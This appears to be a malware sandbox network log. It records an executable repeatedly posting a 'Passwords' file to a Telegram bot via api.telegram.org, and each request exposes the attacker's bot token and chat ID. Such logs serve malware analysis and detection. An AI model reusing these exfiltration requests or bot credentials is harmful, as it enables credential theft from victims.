                                                                                                                2025-01-10 21:43:56 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43632,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545436,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.650011149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:58 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32864a6a8abc
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 36 34 61 36 61 38 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32864a6a8abcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:58 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:58 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:58 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43633,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545438,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.650013149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:59 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd329a828fcc76
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 61 38 32 38 66 63 63 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd329a828fcc76Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:00 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:00 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:00 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43634,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545440,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.650015149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:01 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32aeab857d1a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 65 61 62 38 35 37 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32aeab857d1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:01 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:01 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43635,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545441,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.650017149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:03 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32c16ebc6854
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 31 36 65 62 63 36 38 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32c16ebc6854Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:03 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:03 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43636,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545443,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.650019149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:04 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32d57a7f140f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 35 37 61 37 66 31 34 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32d57a7f140fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:05 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:05 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43637,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545445,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.650021149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:06 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32e8229d8d62
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 38 32 32 39 64 38 64 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32e8229d8d62Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:06 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:06 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:06 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43638,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545446,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.650025149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:08 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32fabd7561cb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 61 62 64 37 35 36 31 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32fabd7561cbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:08 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:08 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
